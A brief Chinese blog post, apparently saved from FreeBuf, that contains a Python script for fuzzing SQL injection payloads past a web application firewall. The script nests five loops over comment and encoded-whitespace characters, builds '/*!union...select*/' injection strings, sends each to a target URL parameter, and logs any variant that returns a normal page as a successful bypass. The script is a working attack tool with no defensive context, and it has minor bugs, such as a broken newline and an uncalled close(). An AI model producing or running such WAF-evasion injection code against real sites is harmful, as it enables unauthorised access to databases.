sql bypass waf fuzz python

从freebuf copy过来的,先保存,有空再改

#encoding=utf-8

import requests

url = "http://127.0.0.1/index.php?id=1"
Fuzz_a = ['/*!','*/','/**/','/','?','~','!','.','%','-','*','+','=']
Fuzz_b = ['']
Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
#配置fuzz字典
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
#设置请求的headers
for a in FUZZ:
	pass
	for b in FUZZ:
		pass
		for c in FUZZ:
			for d in FUZZ:
				pass
				for e in FUZZ:
					pass
					PYLOAD = "/*!union"+a+b+c+d+e+"select*/ 1,2"
					urlp = url+PYLOAD
					res = requests.get(urlp,headers=header)
					#使用for排列组合fuzz字典并请求页面
					if 'flag' in res.text:  #这个flag需要改,根据你测的正常页面中,有什么字段是必然出现的
						print ("[*]URL:"+ urlp +"过狗!")
						f=open('result.txt','a')
						f.write(urlp+"n")
						f.close

  

posted @ 2020-03-15 09:45  左小龙  阅读(434)  评论(0编辑  收藏  举报